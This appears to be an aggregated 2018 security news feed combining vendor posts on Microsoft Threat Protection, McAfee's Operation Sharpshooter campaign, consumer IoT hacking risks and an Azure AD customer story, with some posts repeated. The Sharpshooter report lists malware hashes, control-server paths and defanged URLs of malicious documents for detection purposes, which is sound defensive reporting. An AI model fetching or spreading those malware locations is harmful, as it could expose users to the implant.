Figure 3. Tropic Trooper attack chain.

Seamless integration between disparate services is a core differentiator of Microsoft Threat Protection. During the Tropic Trooper campaign, Windows Defender Advanced Threat Protection (ATP), Azure Active Directory (Azure AD), and Office 365 ATP services worked in sync, helping ensure the threat was addressed quickly with no adverse impact. The campaign initiated several Windows Defender ATP alerts triggering its device risk calculation mechanism, which ascribed affected endpoints with high risk scores. These endpoints were put to the top of the list in Windows Defender Security Center leading to early detection and discovery of the attack. Windows Defender ATP seamlessly integrates with Azure AD featuring conditional access. During Tropic Trooper, conditional access blocked high-risk endpoints from accessing sensitive content, protecting other users, devices, and data in the network.

The Windows team examined the alert timeline (Figure 4) to further investigate and ultimately remediated the threat. Investigating the alerts, the Windows team uncovered the malicious document carrying the Tropic Trooper exploit. Since signal is shared between Microsoft Threat Protection services, the Windows team used Office 365 Threat Intelligences Threat Explorer to find the specific emails used to distribute the exploit. The investigation also showed that Office 365 ATP blocked the malicious emails at the onset, stopping the attacks entry point and protecting Office 365 ATP customers. Endpoints remained secure through Windows Defender ATPs sophisticated automated investigation and remediation capabilities that discovered malicious artifacts on affected endpoints and remediated them. This sequence of actions ensured that the attackers no longer had a foothold on the endpoint ecosystem and that all endpoints returned to normal working state. Importantly, Microsoft Threat Protection services collectively secured identities, endpoints, and Office 365.

Figure 4. Windows Defender ATP alert timeline for Tropic Trooper.

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection. Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities. Begin trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

The post The evolution of Microsoft Threat Protection, December update appeared first on Microsoft Secure.

‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure

This post was written with contributions from the McAfee Advanced Threat Research team.  

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.

Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

Read our full analysis of Operation Sharpshooter.

Have we seen this before?

This campaign, while masquerading as legitimate industry job recruitment activity, gathers information to monitor for potential exploitation. Our analysis also indicates similar techniques associated with other job recruitment campaigns.

Global impact

In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis. Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest. The McAfee Advanced Threat Research team has observed that the majority of targets were defense and government-related organizations.

Targeted organizations by sector in October 2018. Colors indicate the most prominently affected sector in each country. Source: McAfee® Global Threat Intelligence.

Infection flow of the Rising Sun implant, which eventually sends data to the attacker’s control servers.

 

Conclusion

Our discovery of this new, high-function implant is another example of how targeted attacks attempt to gain intelligence. The malware moves in several steps. The initial attack vector is a document that contains a weaponized macro to download the next stage, which runs in memory and gathers intelligence. The victim’s data is sent to a control server for monitoring by the actors, who then determine the next steps.

We have not previously observed this implant. Based on our telemetry, we discovered that multiple victims from different industry sectors around the world have reported these indicators.

Was this attack just a first-stage reconnaissance operation, or will there be more? We will continue to monitor this campaign and will report further when we or others in the security industry receive more information. The McAfee Advanced Threat Research team encourages our peers to share their insights and attribution of who is responsible for Operation Sharpshooter.

 

Indicators of compromise

MITRE ATT&CK™ techniques

  • Account discovery
  • File and directory discovery
  • Process discovery
  • System network configuration discovery
  • System information discovery
  • System network connections discovery
  • System time discovery
  • Automated exfiltration
  • Data encrypted
  • Exfiltration over command and control channel
  • Commonly used port
  • Process injection

Hashes

  • 8106a30bd35526bded384627d8eebce15da35d17
  • 66776c50bcc79bbcecdbe99960e6ee39c8a31181
  • 668b0df94c6d12ae86711ce24ce79dbe0ee2d463
  • 9b0f22e129c73ce4c21be4122182f6dcbc351c95
  • 31e79093d452426247a56ca0eff860b0ecc86009

Control servers

  • 214.99.20/view_style.php
  • 74.41.56/board.php
  • com.sg/board.php

Document URLs

  • hxxp://208.117.44.112/document/Strategic Planning Manager.doc
  • hxxp://208.117.44.112/document/Business Intelligence Administrator.doc
  • hxxp://www.dropbox.com/s/2shp23ogs113hnd/Customer Service Representative.doc?dl=1

McAfee detection

  • RDN/Generic Downloader.x
  • Rising-Sun
  • Rising-Sun-DOC

 

The post ‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure appeared first on McAfee Blogs.

Securing and managing the enterprise Internet of Things

A future where the Internet of Things spreads exponentially is almost certain. Seemingly everybody wants these devices: consumers for the helpful features and manufacturers for the ability to collect data about the product and consumers’ use of it. Paul Calatayud, Palo Alto Networks’ CSO for the Americas, sees the IoT evolving into a new form of distributed computing powered by 5G and ever-increasing bandwidth speeds. The result will be intelligent, programmable devices that operate without … More

The post Securing and managing the enterprise Internet of Things appeared first on Help Net Security.

6.8% of the top 100,000 websites still accept old, insecure SSL versions

Mac-based malware has appeared on the list of the top ten most common types of malware for the first time in WatchGuard’s quarterly Internet security report. The Mac scareware appeared in sixth place in WatchGuard’s latest Q3 2018 report and is primarily delivered by email to trick victims into installing fake cleaning software. Researchers also found that 6.8 percent of the world’s top 100,000 websites still accept old, insecure versions of the SSL encryption protocol, … More

The post 6.8% of the top 100,000 websites still accept old, insecure SSL versions appeared first on Help Net Security.

Will sophisticated attacks dominate in 2019?

Trend Micro released its 2019 predictions report, warning that attackers will increase the effectiveness of proven attack methods by adding more sophisticated elements to take advantage of the changing technology landscape. “As we head into 2019, organizations must understand the security implications of greater cloud adoption, converging IT and OT, and increasing remote working,” said Greg Young, vice president of cybersecurity for Trend Micro. “Cybercriminals will continue to follow a winning formula – exploiting existing … More

The post Will sophisticated attacks dominate in 2019? appeared first on Help Net Security.

Professionally Evil Insights: Professionally Evil CISSP Certification: Breaking the Bootcamp Model

ISC2 describes the CISSP as a way to prove “you have what it takes to effectively design, implement and manage a best-in-class cybersecurity program”.  It is one of the primary certifications used as a stepping stone in your cybersecurity career.   Traditionally, students have two different options to gain this certification; self-study or a bootcamp.  Both of these options have pros and cons, but neither is the best.

Bootcamps are a popular way to cram for the certification test.  Students spend five days in total immersion into the topics of the CBK.  This is an easy way to pass the exam for lots of students because it focuses them on the CISSP study materials for the bootcamp timeframe.  But there are a few negatives to this model.  First is the significant cost.  The typical prices we see are between $3500 and 5000 with outliers as high as almost $7000.  The second issue is that it takes the student away from their life for the week.  Finally, most people finish the bootcamp with the knowledge to pass the exam but since it is crammed in, they quickly forget most of the information.

Self-Study is the other common mechanism for studying for the CISSP exam.  This allows a dedicated student to learn the information at their pace and time frame.  It also allows for them to decide how much to spend.  From books to online videos and practice exams the costs vary.  The main problem with the method is that students often get distracted by life and work while trying to accomplish it.

But there is an answer that combines the benefits of both previous options.  Secure Ideas has developed a mentorship program designed to provide the knowledge necessary to pass the certification, while working through the common body of knowledge (CBK).  All done in a manner that encourages retention of the knowledge.  And it is #affordabletraining!

The mentorship program is designed as a series of weekly mentor led discussion and review sessions along with various student support and communication methods, spanning a total of 9 weeks.  These work together to provide the student a solid foundation to not only help in passing the certification but to continue as a collection of information for everyday work.   This class is set up to cover the 8 domains of the ISC2 CBK:

  • Security and Risk Management
  • Asset Security
  • Security Architecture and Engineering
  • Communication and Network Security
  • Identity and Access Management (IAM)
  • Security Assessment and Testing
  • Security Operations
  • Software Development Security

The Professionally Evil CISSP Mentorship program uses multiple communication and knowledge sharing paths to build a comprehensive learning environment focused on both passing the CISSP certification and gaining a deep understanding of the CBK.

The program consists of the following parts:

  • Official study guide book
  • Weekly live session with instructor(s)
    • Live session will also be recorded
  • Private Slack team for students and instructors to communicate regularly
  • Practice exams
  • While we believe students will pass on their first try, we also include the option for students to take the program as many times as they want, any time we offer it.  🙂

You can sign up for the course over at https://attendee.gototraining.com/r/2538511060126445313 for only $1000.  Our early bird pricing is $800 and is good until January 31.  Just use the Coupon code EARLYBIRD at checkout.  Veterans, active duty military and first responders also get a significant discount.  Email info@secureideas.com for more information.



Professionally Evil Insights

12 Days of Hack-mas

2018 was a wild ride when it came to cybersecurity. While some hackers worked to source financial data, others garnered personal information to personalize cyberattacks. Some worked to get us to download malware in order to help them mine cryptocurrency or harness our devices to join their botnets. And the ways in which they exact their attacks are becoming more sophisticated and harder to detect. 2019 shows no sign of slowing down when it comes to attacks. Between the apps and websites we use every day, in addition to the numerous connected devices we continue to add our homes, there are a lot of ways in which our cybersecurity can be compromised. Let’s take a look at 12 common, connected devices that are vulnerable to attacks –most of which our friends at the “Hackable?” podcast have demonstrated– and what we can do to protect what matters. This way, as we move into the new year, security is top of mind.

Connected Baby Monitors

When you have a child, security and safety fuels the majority of your thoughts. That’s why it’s terrifying to think that a baby monitor, meant to give you peace of mind, could get hacked. Our own “Hackable?” team illustrated exactly how easy it is. They performed a “man-in-the-middle” attack to intercept data from an IoT baby monitor. But the team didn’t stop there; next they overloaded the device with commands and completely crashed the system without warning a parent, potentially putting a baby in danger. If you’re a parent looking to bring baby tech into your home, always be on the lookout for updates, avoid knockoffs or brands you’re not familiar with, and change your passwords regularly.

Smart TVs

With a click of a button or by the sound of our voice, our favorite shows will play, pause, rewind ten seconds, and more – all thanks to smart TVs and streaming devices. But is there a sinister side? Turns out, there is. Some smart TVs can be controlled by cybercriminals by exploiting easy-to-find security flaws. By infecting a computer or mobile device with malware, a cybercriminal could gain control of your smart TV if your devices are using the same Wi-Fi. To prevent an attack, consider purchasing devices from mainstream brands that keep security in mind, and update associated software and apps regularly.

Home Wi-Fi Routers

Wi-Fi is the lifeblood of the 21st century; it’s become a necessity rather than a luxury. But your router is also a cybercriminal’s window into your home. Especially if you have numerous IoT devices hooked up to the same Wi-Fi, a hacker that successfully cracks into your network can get ahold of passwords and personal information, all of which can be used to gain access to your accounts, and launch spear phishing attacks against you to steal your identity or worse. Cybercriminals do this by exploiting weaknesses in your home network. To stay secure, consider a comprehensive security solution like McAfee® Secure Home Platform.

Health Devices and Apps

Digital health is set to dominate the consumer market in the next few years. Ranging from apps to hardware, the ways in which our health is being digitized varies, and so do the types of attacks that can be orchestrated. For example, on physical devices like pacemakers, malware can be implanted directly on to the device, enabling a hacker to control it remotely and inflict real harm to patients. When it comes to apps like pedometers, a hacker could source information like your physical location or regular routines.  Each of these far from benign scenarios highlight the importance of cybersecurity as the health market becomes increasingly reliant on technology and connectivity.

Smart Speakers

It seems like everyone nowadays has at least one smart speaker in their home. However, these speakers are always listening in, and if hacked, could be exploited by cybercriminals through spear phishing attacks. This can be done by spoofing actual websites which trick users into thinking that they are receiving a message from an official source. But once the user clicks on the email, they’ve just given a cybercriminal access to their home network, and by extension, all devices connected to that network too, smart speakers and all. To stay secure, start with protection on your router that extends to your network, change default passwords, and check for built-in security features.

Voice Assistants

Like smart speakers, voice assistants are always listening and, if hacked, could gain a wealth of information about you. But voice assistants are also often used as a central command hub, connecting other devices to them (including other smart speakers, smart lights or smart locks). Some people opt to connect accounts like food delivery, driver services, and shopping lists that use credit cards. If hacked, someone could gain access to your financial information or even access to your home. To keep cybercriminals out, consider a comprehensive security system, know which apps you can trust, and always keep your software up to date.

Connected Cars

Today, cars are essentially computers on wheels. Between backup cameras, video screens, GPS systems, and Wi-Fi networks, they have more electronics stacked in them than ever. The technology makes the experience smoother, but if it has a digital heartbeat, it’s hackable. In fact, an attacker can take control of your car a couple of ways; either by physically implanting a tiny device that grants access to your car through a phone, or by leveraging a black box tool and  your car’s diagnostic port completely remotely. Hacks can range anywhere from cranking the radio up to cutting the transmission or disabling the breaks. To stay secure, limit connectivity between your mobile devices and a car when possible, as phones are exposed to risks every day, and any time you connect it to your car, you put it at risk, too.

Smart Thermostats

A smart thermostat can regulate your home’s temperature and save you money by learning your preferences. But what if your friendly temperature regulator turned against you? If you don’t change your default, factory-set password and login information, a hacker could take control of your device and make it join a botnet

Connected Doorbells

When we think high-tech, the first thing that comes to mind is most likely not a doorbell. But connected doorbells are becoming more popular, especially as IoT devices are more widely adopted in our homes. So how can these devices be hacked, exactly? By sending an official-looking email that requests that a device owner download the doorbell’s app, the user unwittingly gave full access to the unwelcome guest. From there, the hackers could access call logs, the number of devices available, and even video files from past calls. Take heed from this hack; when setting up a new device, watch out for phishing emails and always make sure that an app is legitimate before you download it.

Smart Pet Cameras

We all love our furry friends and when we have to leave them behind as we head out the door. And it’s comforting to know that we can keep an eye on them, even give them the occasional treat through pet cameras. But this pet-nology can be hacked into by cybercriminals to see what’s get an inside look at your home, as proven by the “Hackable?” crew. Through a device’s app, a white-hat hacker was able to access the product’s database and was able to download photos and videos of other device owners. Talk about creepy. To keep prying eyes out of your private photos, get a comprehensive security solution for your home network and devices, avoid checking on your pet from unsecured Wi-Fi, and do your research on smart products you purchase for your pets.

Cell Phones

Mobile phones are one of the most vulnerable devices simply because they go everywhere you go. They essentially operate as a personal remote control to your digital life. In any given day, we access financial accounts, confirm doctor’s appointments and communicate with family and friends. That’s why is shocking to know how surprisingly easy it is for cybercriminals to access the treasure trove of personal data on your cell phone. Phones can be compromised a variety of ways; but here are a few: accessing your personal information by way of public Wi-Fi (say, while you’re at an airport), implanting a bug, leveraging a flaw in the operating system, or by infecting your device with malware by way of a bad link while surfing the web or browsing email.  Luckily, you can help secure your device by using comprehensive security such as McAfee Total Protection, or by leveraging a VPN (virtual private network) if you find yourself needing to use public Wi-Fi.

Virtual Reality Headsets

Once something out of a science fiction, virtual reality (VR) is now a high-tech reality for many. Surprisingly, despite being built on state of the art technology, VR is quite hackable. As an example, though common and easy-to-execute tactics like phishing to prompt someone to download malware, white-hat hackers were able to infect a linked computer and execute a command and control interface that manipulated the VR experience and disorientated the user. While this attack isn’t common yet, it could certainly start to gain traction as more VR headsets make their way into homes. To stay secure, be picky and only download software from reputable sources.

This is only the tip of the iceberg when it comes to hackable, everyday items. And while there’s absolutely no doubt that IoT devices certainly make life easier, what it all comes down to is control versus convenience. As we look toward 2019, we should ask ourselves, “what do we value more?”

Stay up-to-date on the latest trends by subscribing to our podcast, “Hackable?” and follow us on Twitter or Facebook.

The post 12 Days of Hack-mas appeared first on McAfee Blogs.

McAfee Blogs: 12 Days of Hack-mas

2018 was a wild ride when it came to cybersecurity. While some hackers worked to source financial data, others garnered personal information to personalize cyberattacks. Some worked to get us to download malware in order to help them mine cryptocurrency or harness our devices to join their botnets. And the ways in which they exact their attacks are becoming more sophisticated and harder to detect. 2019 shows no sign of slowing down when it comes to attacks. Between the apps and websites we use every day, in addition to the numerous connected devices we continue to add our homes, there are a lot of ways in which our cybersecurity can be compromised. Let’s take a look at 12 common, connected devices that are vulnerable to attacks –most of which our friends at the “Hackable?” podcast have demonstrated– and what we can do to protect what matters. This way, as we move into the new year, security is top of mind.

Connected Baby Monitors

When you have a child, security and safety fuels the majority of your thoughts. That’s why it’s terrifying to think that a baby monitor, meant to give you peace of mind, could get hacked. Our own “Hackable?” team illustrated exactly how easy it is. They performed a “man-in-the-middle” attack to intercept data from an IoT baby monitor. But the team didn’t stop there; next they overloaded the device with commands and completely crashed the system without warning a parent, potentially putting a baby in danger. If you’re a parent looking to bring baby tech into your home, always be on the lookout for updates, avoid knockoffs or brands you’re not familiar with, and change your passwords regularly.

Smart TVs

With a click of a button or by the sound of our voice, our favorite shows will play, pause, rewind ten seconds, and more – all thanks to smart TVs and streaming devices. But is there a sinister side? Turns out, there is. Some smart TVs can be controlled by cybercriminals by exploiting easy-to-find security flaws. By infecting a computer or mobile device with malware, a cybercriminal could gain control of your smart TV if your devices are using the same Wi-Fi. To prevent an attack, consider purchasing devices from mainstream brands that keep security in mind, and update associated software and apps regularly.

Home Wi-Fi Routers

Wi-Fi is the lifeblood of the 21st century; it’s become a necessity rather than a luxury. But your router is also a cybercriminal’s window into your home. Especially if you have numerous IoT devices hooked up to the same Wi-Fi, a hacker that successfully cracks into your network can get ahold of passwords and personal information, all of which can be used to gain access to your accounts, and launch spear phishing attacks against you to steal your identity or worse. Cybercriminals do this by exploiting weaknesses in your home network. To stay secure, consider a comprehensive security solution like McAfee® Secure Home Platform.

Health Devices and Apps

Digital health is set to dominate the consumer market in the next few years. Ranging from apps to hardware, the ways in which our health is being digitized varies, and so do the types of attacks that can be orchestrated. For example, on physical devices like pacemakers, malware can be implanted directly on to the device, enabling a hacker to control it remotely and inflict real harm to patients. When it comes to apps like pedometers, a hacker could source information like your physical location or regular routines.  Each of these far from benign scenarios highlight the importance of cybersecurity as the health market becomes increasingly reliant on technology and connectivity.

Smart Speakers

It seems like everyone nowadays has at least one smart speaker in their home. However, these speakers are always listening in, and if hacked, could be exploited by cybercriminals through spear phishing attacks. This can be done by spoofing actual websites which trick users into thinking that they are receiving a message from an official source. But once the user clicks on the email, they’ve just given a cybercriminal access to their home network, and by extension, all devices connected to that network too, smart speakers and all. To stay secure, start with protection on your router that extends to your network, change default passwords, and check for built-in security features.

Voice Assistants

Like smart speakers, voice assistants are always listening and, if hacked, could gain a wealth of information about you. But voice assistants are also often used as a central command hub, connecting other devices to them (including other smart speakers, smart lights or smart locks). Some people opt to connect accounts like food delivery, driver services, and shopping lists that use credit cards. If hacked, someone could gain access to your financial information or even access to your home. To keep cybercriminals out, consider a comprehensive security system, know which apps you can trust, and always keep your software up to date.

Connected Cars

Today, cars are essentially computers on wheels. Between backup cameras, video screens, GPS systems, and Wi-Fi networks, they have more electronics stacked in them than ever. The technology makes the experience smoother, but if it has a digital heartbeat, it’s hackable. In fact, an attacker can take control of your car a couple of ways; either by physically implanting a tiny device that grants access to your car through a phone, or by leveraging a black box tool and  your car’s diagnostic port completely remotely. Hacks can range anywhere from cranking the radio up to cutting the transmission or disabling the breaks. To stay secure, limit connectivity between your mobile devices and a car when possible, as phones are exposed to risks every day, and any time you connect it to your car, you put it at risk, too.

Smart Thermostats

A smart thermostat can regulate your home’s temperature and save you money by learning your preferences. But what if your friendly temperature regulator turned against you? If you don’t change your default, factory-set password and login information, a hacker could take control of your device and make it join a botnet

Connected Doorbells

When we think high-tech, the first thing that comes to mind is most likely not a doorbell. But connected doorbells are becoming more popular, especially as IoT devices are more widely adopted in our homes. So how can these devices be hacked, exactly? By sending an official-looking email that requests that a device owner download the doorbell’s app, the user unwittingly gave full access to the unwelcome guest. From there, the hackers could access call logs, the number of devices available, and even video files from past calls. Take heed from this hack; when setting up a new device, watch out for phishing emails and always make sure that an app is legitimate before you download it.

Smart Pet Cameras

We all love our furry friends and when we have to leave them behind as we head out the door. And it’s comforting to know that we can keep an eye on them, even give them the occasional treat through pet cameras. But this pet-nology can be hacked into by cybercriminals to see what’s get an inside look at your home, as proven by the “Hackable?” crew. Through a device’s app, a white-hat hacker was able to access the product’s database and was able to download photos and videos of other device owners. Talk about creepy. To keep prying eyes out of your private photos, get a comprehensive security solution for your home network and devices, avoid checking on your pet from unsecured Wi-Fi, and do your research on smart products you purchase for your pets.

Cell Phones

Mobile phones are one of the most vulnerable devices simply because they go everywhere you go. They essentially operate as a personal remote control to your digital life. In any given day, we access financial accounts, confirm doctor’s appointments and communicate with family and friends. That’s why is shocking to know how surprisingly easy it is for cybercriminals to access the treasure trove of personal data on your cell phone. Phones can be compromised a variety of ways; but here are a few: accessing your personal information by way of public Wi-Fi (say, while you’re at an airport), implanting a bug, leveraging a flaw in the operating system, or by infecting your device with malware by way of a bad link while surfing the web or browsing email.  Luckily, you can help secure your device by using comprehensive security such as McAfee Total Protection, or by leveraging a VPN (virtual private network) if you find yourself needing to use public Wi-Fi.

Virtual Reality Headsets

Once something out of a science fiction, virtual reality (VR) is now a high-tech reality for many. Surprisingly, despite being built on state of the art technology, VR is quite hackable. As an example, though common and easy-to-execute tactics like phishing to prompt someone to download malware, white-hat hackers were able to infect a linked computer and execute a command and control interface that manipulated the VR experience and disorientated the user. While this attack isn’t common yet, it could certainly start to gain traction as more VR headsets make their way into homes. To stay secure, be picky and only download software from reputable sources.

This is only the tip of the iceberg when it comes to hackable, everyday items. And while there’s absolutely no doubt that IoT devices certainly make life easier, what it all comes down to is control versus convenience. As we look toward 2019, we should ask ourselves, “what do we value more?”

Stay up-to-date on the latest trends by subscribing to our podcast, “Hackable?” and follow us on Twitter or Facebook.

The post 12 Days of Hack-mas appeared first on McAfee Blogs.



McAfee Blogs

Voice of the Customer: The Walsh Group found that Azure Active Directory gives them a competitive edge

Todays post was written by Sue Bohn, partner director of Program Management, and Peter Vallianatos and Phillip Nottoli, directors of IT Infrastructure and Security at The Walsh Group.

Hello!

This is Sue Bohn from the Customer & Partner Success team for the Identity Division. Im delighted to announce the next post in our Voice of the Customer blog series. This series is designed to help you by sharing stories from real customers who are solving their identity and security challenges using Azure Active Directory (Azure AD). I hope you find valuable insights and best practices that you can apply to your own projects. If you havent already, check out the first blog from in the series, Voice of the Customer: Walmart embraces the cloud with Azure AD.

This post features The Walsh Group, a large construction company in the United States. The Walsh Group has been with us from the early days in adopting Azure AD. Theyve taken advantage of its capabilities to strengthen access controls, provide more flexibility to users, and reduce the time their help desk spends on password resets. Peter Vallianatos and Phillip Nottoli, directors of IT Infrastructure and Security, provide insights on how they implemented Azure AD to give them a competitive advantage in the general contractor marketplace.

Security is no longer just about firewalls, its how we control identity

The Walsh Group is one of the largest construction companies in the United States with offices and job sites across the country. Like many businesses, identity and security initiatives increased in priority for us a few years ago. We had recently invested in Office 365, which allowed us to shift much of the responsibility for the uptime of our core productivity suite to Microsoft. It saved us time, but it also meant we would have less control than we were used to. We needed to find a way to manage our identities and shore up security. As an example, we did not have a Multi-Factor Authentication (MFA) solution. On top of that, our help desk was begging us to come up with a solution to reduce the amount of time they spent helping our users reset their passwords.

As we researched solutions to fill our security holes, we had to balance the need for best-in-breed security products with the fact that we have tight budgets and a drive to make economic decisions. It was important that we found tools that would be effective, easy to deploy, and easy to integrate. Historically, well before the Azure days, we viewed Microsoft as a strategic partner. So we quickly zeroed in on the complete Microsoft 365 identity stack that includes: Azure AD, Microsoft Cloud App Security, Microsoft Advanced Threat Analytics, Privileged Identity Management, Azure Advanced Threat Protection, Windows Defender Advanced Threat Protection, Azure Identity Protection, Microsoft Intune, Single Sign-on, Self-Service Password Reset, among others.

Azure AD conditional access is central to our Zero Trust strategy

Using the Microsoft security stack has also allowed us to begin implementing a Zero Trust strategy. We believe identity is the foundation of our security posture. As a construction company, we have so many locations, creating opportunities for exploitation. We must properly verify identities before we give access. Azure AD conditional access has given us tools to better control access by defining geographical rules and hardware restrictions. As an example, we simply blocked all access from many countries across the world. We could do that because we operate mostly within North America. As Azure AD conditional access matured, we changed our strategy. To support our people that vacation overseas, weve been able to build sophisticated rules that consider if a device is Intune managed, hybrid joined, and where the device is located. Combining that rule set with MFA, weve been able to safely give our vacationers access to email and other business resources.

Paying attention to the sign-in events, we can adjust our ruleset to further restrict or allow for circumstances that we did not consider. For certain, nearly all the failed sign-in attempts are malicious. It is nice to have that visibility into and control over when and how our networks are accessed.

We bet the farm with Microsoft

We chose to be an early adopter of the Azure AD identity framework. At the time, the tools were just emerging, but we understood the vision, the direction, and Microsofts roadmap to get there. Microsoft helped us establish short-, middle-, and long-range plans, and we rely on their security and identity products more and more. We don’t have that level of confidence in nor the relationship with other vendors. For us, the evidence is clear, we chose the right partner. As a general contractor, this platform has allowed us to remain competitive in our marketplace. Out implementation of Azure AD gives us a competitive advantage that will continue to pay dividends as our cloud strategy grows and we make use of the Office 365 and Azure features. Currently, we have turned our energy towards Microsoft Cloud App Security and operationalizing the Windows Defender Advanced Threat Protection integration across platforms. Already, we are recognizing the value in having all three Advanced Threat Protection products integrated and will continue to fine tune how we manage it.

Voice of the Customerlooking ahead

Many thanks to Pete and Phil for sharing their journey from on-premises to Azure AD. Our customers have told us how valuable it is to learn from their peers. The Voice of the Customer blog series is designed to share our customers security and implementation insights more broadly. Bookmark the Microsoft Secure blog, so you dont miss the next installment in this series, where our customer will speak to how Azure AD and implementing cloud identity and access management makes them more secure.

The post Voice of the Customer: The Walsh Group found that Azure Active Directory gives them a competitive edge appeared first on Microsoft Secure.

Microsoft Secure: Voice of the Customer: The Walsh Group found that Azure Active Directory gives them a competitive edge

Todays post was written by Sue Bohn, partner director of Program Management, and Peter Vallianatos and Phillip Nottoli, directors of IT Infrastructure and Security at The Walsh Group.

Hello!

This is Sue Bohn from the Customer & Partner Success team for the Identity Division. Im delighted to announce the next post in our Voice of the Customer blog series. This series is designed to help you by sharing stories from real customers who are solving their identity and security challenges using Azure Active Directory (Azure AD). I hope you find valuable insights and best practices that you can apply to your own projects. If you havent already, check out the first blog from in the series, Voice of the Customer: Walmart embraces the cloud with Azure AD.

This post features The Walsh Group, a large construction company in the United States. The Walsh Group has been with us from the early days in adopting Azure AD. Theyve taken advantage of its capabilities to strengthen access controls, provide more flexibility to users, and reduce the time their help desk spends on password resets. Peter Vallianatos and Phillip Nottoli, directors of IT Infrastructure and Security, provide insights on how they implemented Azure AD to give them a competitive advantage in the general contractor marketplace.

Security is no longer just about firewalls, its how we control identity

The Walsh Group is one of the largest construction companies in the United States with offices and job sites across the country. Like many businesses, identity and security initiatives increased in priority for us a few years ago. We had recently invested in Office 365, which allowed us to shift much of the responsibility for the uptime of our core productivity suite to Microsoft. It saved us time, but it also meant we would have less control than we were used to. We needed to find a way to manage our identities and shore up security. As an example, we did not have a Multi-Factor Authentication (MFA) solution. On top of that, our help desk was begging us to come up with a solution to reduce the amount of time they spent helping our users reset their passwords.

As we researched solutions to fill our security holes, we had to balance the need for best-in-breed security products with the fact that we have tight budgets and a drive to make economic decisions. It was important that we found tools that would be effective, easy to deploy, and easy to integrate. Historically, well before the Azure days, we viewed Microsoft as a strategic partner. So we quickly zeroed in on the complete Microsoft 365 identity stack that includes: Azure AD, Microsoft Cloud App Security, Microsoft Advanced Threat Analytics, Privileged Identity Management, Azure Advanced Threat Protection, Windows Defender Advanced Threat Protection, Azure Identity Protection, Microsoft Intune, Single Sign-on, Self-Service Password Reset, among others.

Azure AD conditional access is central to our Zero Trust strategy

Using the Microsoft security stack has also allowed us to begin implementing a Zero Trust strategy. We believe identity is the foundation of our security posture. As a construction company, we have so many locations, creating opportunities for exploitation. We must properly verify identities before we give access. Azure AD conditional access has given us tools to better control access by defining geographical rules and hardware restrictions. As an example, we simply blocked all access from many countries across the world. We could do that because we operate mostly within North America. As Azure AD conditional access matured, we changed our strategy. To support our people that vacation overseas, weve been able to build sophisticated rules that consider if a device is Intune managed, hybrid joined, and where the device is located. Combining that rule set with MFA, weve been able to safely give our vacationers access to email and other business resources.

Paying attention to the sign-in events, we can adjust our ruleset to further restrict or allow for circumstances that we did not consider. For certain, nearly all the failed sign-in attempts are malicious. It is nice to have that visibility into and control over when and how our networks are accessed.

We bet the farm with Microsoft

We chose to be an early adopter of the Azure AD identity framework. At the time, the tools were just emerging, but we understood the vision, the direction, and Microsofts roadmap to get there. Microsoft helped us establish short-, middle-, and long-range plans, and we rely on their security and identity products more and more. We don’t have that level of confidence in nor the relationship with other vendors. For us, the evidence is clear, we chose the right partner. As a general contractor, this platform has allowed us to remain competitive in our marketplace. Out implementation of Azure AD gives us a competitive advantage that will continue to pay dividends as our cloud strategy grows and we make use of the Office 365 and Azure features. Currently, we have turned our energy towards Microsoft Cloud App Security and operationalizing the Windows Defender Advanced Threat Protection integration across platforms. Already, we are recognizing the value in having all three Advanced Threat Protection products integrated and will continue to fine tune how we manage it.

Voice of the Customerlooking ahead

Many thanks to Pete and Phil for sharing their journey from on-premises to Azure AD. Our customers have told us how valuable it is to learn from their peers. The Voice of the Customer blog series is designed to share our customers security and implementation insights more broadly. Bookmark the Microsoft Secure blog, so you dont miss the next installment in this series, where our customer will speak to how Azure AD and implementing cloud identity and access management makes them more secure.

The post Voice of the Customer: The Walsh Group found that Azure Active Directory gives them a competitive edge appeared first on Microsoft Secure.



Microsoft Secure

WordPress Botnet Infects Over 20,000 Sites and Turns Them into Attack Bots

Wordfence, a Security firm has reportedly uncovered a massive Brute force attack launched on WordPress sites. This attack reportedly infected

WordPress Botnet Infects Over 20,000 Sites and Turns Them into Attack Bots on Latest Hacking News.

CISO challenges and the path to cutting edge security

Zane Lackey is the co-founder and CSO at Signal Sciences, and the author of Building a Modern Security Program (O’Reilly Media). He serves on multiple Advisory Boards including the National Technology Security Coalition, the Internet Bug Bounty Program, and the US State Department-backed Open Technology Fund. Prior to co-founding Signal Sciences, Zane lead a security team at the forefront of the DevOps/Cloud shift as CISO of Etsy. In this interview with Help Net Security he … More

The post CISO challenges and the path to cutting edge security appeared first on Help Net Security.

High profile incidents and new technologies drive cybersecurity M&A to record highs

The Cybersecurity M&A Market Report from international technology mergers and acquisitions advisors, Hampleton Partners, outlines how high profile hacks, the global digitisation of business and new regulations are driving record transaction volumes and valuations, with 141 completed transactions by October this year, surpassing 2016 and 2017 levels. 2018 has seen nine big ticket deals in excess of $500m from buyers such as Thoma Bravo, Cisco, RELX, AT&T and Francisco Partners, which have generated attention to … More

The post High profile incidents and new technologies drive cybersecurity M&A to record highs appeared first on Help Net Security.

An integrated approach helps companies improve operational resilience

By taking a unified approach to managing critical events (i.e. extreme weather, violence, supply chain disruption), businesses can significantly reduce the impact on employee safety, organizational reputation, and revenue, according to a study conducted by Forrester Consulting for Everbridge. According to the study, companies are investing significant resources in sophisticated controls to protect their employees, brand and assets from critical events. These disruptive incidents (ranging from cyberattacks to terrorist activity) increasingly lead to business impacts … More

